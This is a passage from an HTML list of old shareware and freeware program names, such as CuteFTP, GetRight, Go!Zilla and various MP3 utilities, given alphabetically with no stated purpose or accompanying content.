/>Clarisys<br />Classic Peg Solitaire 1.0<br />ClipMate5-Student Edition<br />Clock Saver 1.0<br />ComTry Music Downloader 2.2<br />Concentration Done Right 1<br />Connection Watcher 4<br />Crystal FTP 2000<br />CSE HTML Validator Lite<br />CuteFTP 3.0 beta<br />CuteFTP 3.0/3.5<br />CuteFTP/Tripod<br />CutePage<br />CutePage 2.0<br />CuteMX<br /><br />Danzig Pref Engine 1.1<br />DateTime 1.3<br />Delphi Component Test<br />Delphi Tester<br />Desk Reference 0.1<br />Dialarm 1.0.1.19<br />Dialer 2000 1.5<br />Digi-Cam Web Page Generator<br />DigiBand NewsWatch<br />DigiCams - The WebCam Viewer 1.0<br />DigiCams Pro<br />Digital Postman 2.0<br />Direct Connect 0.9.963<br />DirectUpdate<br />diskSpace explorer 2000 2.1<br />DL-Mail Pro 2000<br />Doorbell 1.18<br />Download Minder 1.5/1.8<br />Download Wonder 1.55<br />DownloadAgent<br />DownLoader 1.1<br />dozeCrypt III<br />DuRu 1<br />Dwyco Video Conferencing 2.3<br /><br />eAssist<br />Easy Splitter 1<br />EasySeeker 4.0<br />EIS Web Monitor 1.2<br />Email Extractor'99 2.92<br />Encoding Utility 2000<br />EnvoyMail<br />EURO Converter 2<br />Everylink for You 2000<br />EVocabFlashCard 1.0<br />Executive Accounting-Demo<br />Express Communicator 1<br />EZ-forms FREE<br /><br />File&MP3 Renamer'99<br />File Mag-Net 3.0<br />FileSeeker<br />FileSender<br />FileSplit 2.2<br />Fire Client 1.5b1100<br />FlashGet (formerly JetCar) 0.87<br />FloorplanLT<br />Folder Guard Jr. 4.1<br />formToolLT<br />FourTimes 3.5<br />Frazzle<br />FreeBudget<br />Free Hearts for Windows 1<br />Free Picture Harvester<br />Free Solitaire 3.0<br />Free Spades .7<br />Free Submitter Pro<br />FreeImageEditor 1.0<br />FreeIRC 1.0<br />FreeNotePad 1.0<br />FreeSaver MP3 1.0<br />FreeSite 1.0<br />FreeSubmit 1.0<br />FreeWebBrowser 1.0<br />FreeWebMail 1.0<br />FreeZip! 2.0<br />FTPEditor 1.7<br />Fundi e-Lert 1.4.1.29<br /><br />GenoPro 1.71<br />GetRight 4.1<br />GetRight Mail Control 1.0<br />Gif Animator 1.00<br />GifLine Pro 2.0.2<br />GovernMail<br />Go!Zilla 3.5<br />Go!Zilla WebAttack<br />Gomoku Pro 1.1<br />GovernMmail 1.1<br />Grafula 1.2<br />Gunther's PasswordSentry<br /><br />HangWeb<br />hesci Private Label<br />Hey.Beer.Man<br />Host Monitor 4<br />HTML Translator 2.5<br />HTTP Proxy-Spy<br />Huey v1.8 Color Picker 1.8<br />HyperSnap-DX3.61<br /><br />iAgent 1.0<br />Iban Technologies IP Tools 2000 3.1<br />Ice Fusion<br />Idyle GimmIP 4/4.00<br />iFind Graphics 1.5<br />imageN<br />ImagerX 2000 3.0<br />In School We Trust (Pupil Edition)<br />Infinite Patience 2.2<br />InfoBlast<br />InnovaClub<br />iNetPad 3.1<br />InstallZIP 1.4<br />Interchange FTP 0.2.1<br />InterFax 6.0.0<br />Internet Tree 2.0<br />Internetrix 1.0<br />InterWebWord Companion<br />Invisible Secrets 2.0<br />IP-Turboscanner<br />iToday<br />Iwan's MP3 Finder 1.1<br />IYSoft Dial-Up Connection 1.2<br /><br />JetCar<br />JFK Research<br />jIRC<br />JOC Email Checker 1.7<br />JOC Web Finder<br />JOC Web Spider<br />JOC Web Spider 2.6<br />JPEG Optimizer 3.07<br />JrEdit 1<br />Jukebox player<br /><br />Kachat Messenger<br />Keyword Monitor 1<br />KVT Diplom<br /><br />LapLink FTP 2.0<br />Laser Chess 1.0<br />LineSoft Download<br />LinkProver 2.0<br />LOL Chat 2.5<br /><br />Magellan explorer 2.2<br />Mail Them<br />Manifest Timetrap 3.0<br />Marker 1.1<br />MASH-The Microsoft Agent Scripting Helper 4.5.3<br />MasterCrypt 2.0<br />Match It 1.0<br />Maxxchat 1.0 B-6<br />Meeting Planner 0.8.0.1<br />MegaSafe 6<br />MemriC 1.0<br />Meracl FontMap<br />Meracl FontMap 1.2<br />Meracl Hexocol 1.1<br />Meracl ID3 Tag Writer<br />Meracl ImageMap Generator 3.4<br />Meracl MD Recorder 1.0<br />MetaMan<br />Midnight Oil Solitaire 3.1<br />MillenniuM BReaThe beta 0.3b<br />MiniMemo-Die Cheatsdatenbank 9.0<br />MirNik Internet Finder 1.0<br />MonIRC 1.0.0.2<br />MoonWalker 2000 2.0.0<br />More Space 99 3.1<br />MouseAssist-awaiting final approval<br />MP3 Album Finder 1.3<br />MP3 Cat 1.0<br />MP3 Fiend 5.5<br />MP3 Grouppie 4.5<br />MP3 INFO-Editor<br />MP3 Mag-Net 1.0<br />MP3 Player 2000 6.2<br />MP3 Renamer 1.33<br />Mp3 Stream Recorder 2.3<br />MultiSender 1.03<br />Music Genie 1.0<br />MX Inspector BIG AD<br />My Genie Patriots<br />My Genie SE<br />My Genie Sports Edition 2.5<br />My GetRight 1.0<br /><br />NeatFTP 1.0<br />Net CB 1.0<br />Net Scan 2000<br />Net Vampire 3.3<br />Net-A-Car Feature Car Screensaver<br />NetAnts<br />NetBoard<br />Netbus Pro 2.10<br />NetCaptor 5.0<br />Netman Downloader 1.0<br />NetMole 1.0<br />NetNak 4.2<br />NetShark 1.0<br />NetSuck 3.10.5/3.1<br />NetTime Thingy 1.5<br />Network Assistant 1.9<br />NetXtract<br />NeuroStock<br />NewsShark<br />NewsWire 1.5<br />NfoNak 4.1<br />NikNak 2.0.1<br />NotePads+ 2.0<br />Notificator 1.01b<br /><br />Octopus 3.0<br />OfTheDay Creator 1.0<br />OfTheDay Quizzer 1.1<br />OnlineCall 1.19<br />Option Insight 0.6.2<br /><br />Paint by numbers<br />Pattern Book 1.0.02<br />PerfectPartner-Time&Billing (Demo)2.0<br />Personal internet Finder 1.7<br />Personal Search Agent .8<br />People Seek 98<br />PGNSetup<br />Photocopier 2.0<br />PicPluck 2.0<br />Pictures In News 1.0<br />Ping Thingy<br />PingMaster<br />Pixel Pirate 1.0<br />Planet.Billboard<br />Planet.MP3Find 3.0<br />PMS<br />ponnu CHAMY's Music<br />PopMon 1.0.0.1<br />Popup Dictionary 2.0.70<br />PowerPak Accounting and Inventory Management-Demo 2<br />PrePromote 1.0.0<br />PromaSoft Autoresponder 1.0732<br />ProtectX 3.0<br />ProxyChecker<br /><br />Q*Wallet 1.6<br />QuadSucker/Web 1.8<br />Quadzle Puzzles<br />QuikLink Autobot<br />QuikLink Explorer<br />QuikLink Explorer Freeware Edition 3.0<br />QuikLink Explorer Gold Edition 3.0<br />Quo Tracker 1.1.48<br />Quota<br />Quote Ticker Bar 6.0<br />QuoteWatch 4.2<br /><br />Real Estate Web Site Creator 1.0<br />ReallyEasy Interactor 3.0(1)<br />RealReverb Convolution 1.3<br />Recipe Review<br />Rededit<br />ReGet 1.6<br />Remoteshut<br />Rename Master<br />Rest Your Eyes 3.0<br />Resume Detective 1.5<br />RingSurf<br />RoboCam 1.10<br />Rosemary's Weird Web World<br />Rosoft CD Extractor 1.09<br />Rosoft Media Player.1<br /><br />SimpleFind 1.0<br />SimpleSubmit 1.0<br />SiteBack<br />SiteChecker<br />SiteSniffer 1.0<br />Skeet Shooting 1.1<br />SaberQuest Page Burner<br />SaberQuest Tag Specification Edit<br />Savings4u 1.0 Beta 3<br />SBJV 3.0<br />SBWcc 2.0<br />Scout's Game 1.0<br />ScreenFIRE 3.0<br />ScreenFIRE - FileKing<br />ScreenFlavors<br />Scripto .80<br />Sea Battle 1.0<br />SERanker 1.24<br />Shapez! 1.0<br />Shizzam 2.6<br />Simple Submit 1.0<br />SimpleFind 1.0<br />SiteBack<br />SiteChecker<br />Sitesniffer 1.0<br />Skeet Shooting 1.1<br />SK-111<br />SLEdit<br />Slide Puzzle 1.00<br />SmartBoard 200 FREE Edition 2.6<br />Smart 'n Sticky<br />SmartSum Calculator 2.0<br />Snap-It 4.0<br />Sn